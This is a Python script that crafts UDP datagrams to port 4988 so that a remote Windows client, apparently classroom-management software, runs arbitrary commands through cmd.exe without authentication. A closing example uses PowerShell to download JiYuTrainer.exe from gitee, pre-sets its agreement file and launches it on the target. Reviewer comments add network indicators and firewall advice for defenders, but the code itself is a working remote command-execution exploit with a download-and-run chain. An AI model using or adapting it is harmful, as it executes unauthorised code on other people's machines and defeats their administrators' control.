# (c)2026 Goldfish Inc.

import socket
from os import urandom
from struct import pack

# Fixed 12-byte prefix of every datagram send_cmd builds. The first four bytes
# are ASCII "DMOC", a stable marker for matching this traffic in a capture.
# NOTE(review): 0x036e (878, little-endian) equals len(store2) + 809, the
# number of bytes send_cmd places after the 16 random bytes. It is presumably
# a length field; confirm against the protocol.
store1 = list(bytes.fromhex(
    "444d4f43"  # "DMOC"
    "00000100"
    "6e030000"
))

# Fixed 69-byte block that follows the 16 random bytes: 32 bytes of constant
# fields, then the UTF-16LE text "<WINSYSDIR>\cmd.exe" with its final 0x00
# dropped (the zero-filled array appended by send_cmd supplies that byte).
# NOTE(review): c0 a8 6e 80 reads as 192.168.110.128 if it is an IPv4 address;
# the meaning of the other constant fields is not visible here.
store2 = list(
    bytes.fromhex(
        "204e0000" "c0a86e80"
        "61030000" "61030000"
        "00020000" "00000000"
        "0f000000" "01000000"
    )
    + "<WINSYSDIR>\\cmd.exe".encode("utf-16-le")[:-1]
)

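def send_cmd(ip_addr: str, port: int, cmd_cmd: str) -> bool:
    """Send one UDP datagram carrying *cmd_cmd* as an argument string for cmd.exe.

    The datagram is ``store1`` + 16 fresh random bytes + ``store2`` + an
    809-byte zero-filled array into which the text ``/s /c "<cmd_cmd>"`` is
    written two bytes per character starting at offset 475. With the module's
    constants the datagram is always 906 bytes long.

    Security notes for reviewers and defenders:

    * Nothing assembled here is a credential, MAC or signature: the packet is
      constants, ``urandom`` output and the command text. Whether the receiver
      authenticates the sender cannot be determined from this file.
    * The constant parts give stable network indicators: the leading ASCII
      ``DMOC``, the UTF-16LE ``<WINSYSDIR>\\cmd.exe`` string, and the fixed
      906-byte length.
    * Limiting which hosts may reach the receiver's UDP port, for example with
      a host firewall rule that admits only the management console, removes
      this path for other senders.

    Args:
        ip_addr: Destination host passed to ``sendto``.
        port: Destination UDP port.
        cmd_cmd: Command text; it is wrapped in ``/s /c "..."`` before encoding.

    Returns:
        Always ``True``. No reply is read, so the value says nothing about
        delivery or about whether the receiver acted on the datagram.
    """
    cmd_cmd = "/s /c \"" + cmd_cmd + "\""
    arr = [0] * 809
    arr[799] = 0x01
    idx = 475
    # NOTE(review): the hex-string slicing below only splits correctly when
    # hex(ord(ch)) has exactly two or four hex digits; other code points raise
    # IndexError or are mis-split. There is also no bounds check, so long input
    # overwrites arr[799] or raises IndexError. Both are left as the author
    # wrote them.
    for ch in cmd_cmd:
        tmp = ''.join(hex(ord(ch)))
        if int(tmp, 16) > 0xff:
            tmp = tmp[2:]
            high = int((tmp[0] + tmp[1]), 16)
        else:
            high = 0
        low = int((tmp[2] + tmp[3]), 16)
        # Low byte first, then high byte (little-endian 16-bit units).
        arr[idx] = low
        arr[idx + 1] = high
        idx += 2
    result = store1 + list(urandom(16)) + store2 + arr
    payload = pack("%dB" % len(result), *result)
    # The original never closed the socket; the context manager releases the
    # descriptor even if sendto raises (e.g. on an unresolvable address).
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client:
        client.sendto(payload, (ip_addr, port))
    return True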

# Template call. "IP地址" ("IP address") and "命令" ("command") are placeholders
# to be replaced; as written the host string is not a usable address.
# NOTE(review): every call below runs at import time, not only when the file
# is executed as a script.
send_cmd("IP地址", 4988, "命令")

# What follows is an example (automatically downloads and runs JiYuTrainer);
# it can be deleted.
from time import sleep
# Step 1: asks the receiver to run PowerShell's `curl` and save the
# JiYuTrainer 1.7.6 release executable as T.exe in the user's Downloads folder.
# NOTE(review): the URL carries no scheme, and the downloaded file is not
# checked against a hash or signature before it is started in step 3.
send_cmd("IP地址", 4988, "start \"\"/min powershell curl -Uri gitee.com/wds824/JiYuTrainer/releases/download/1.7.6/JiYuTrainer.exe -UseBasicParsing -OutFile %USERPROFILE%\\Downloads\\T.exe")
# Step 2: writes T.ini next to it with a [JTArgeement] section and Argeed=TRUE.
# The spellings are part of the command string and are kept as-is.
# Presumably this pre-sets the tool's agreement prompt -- confirm against the tool.
send_cmd("IP地址", 4988, "(echo [JTArgeement]&echo Argeed=TRUE)>%USERPROFILE%\\Downloads\\T.ini")
print("Wait for 15 seconds...")
# Fixed delay only: send_cmd reads no reply, so nothing here confirms that the
# download has finished before step 3 is sent.
sleep(15)
# Step 3: starts the downloaded executable.
# Host artifacts of this sequence: T.exe and T.ini under %USERPROFILE%\Downloads,
# and a powershell process launched from cmd.exe.
send_cmd("IP地址", 4988, "start %USERPROFILE%\\Downloads\\T.exe")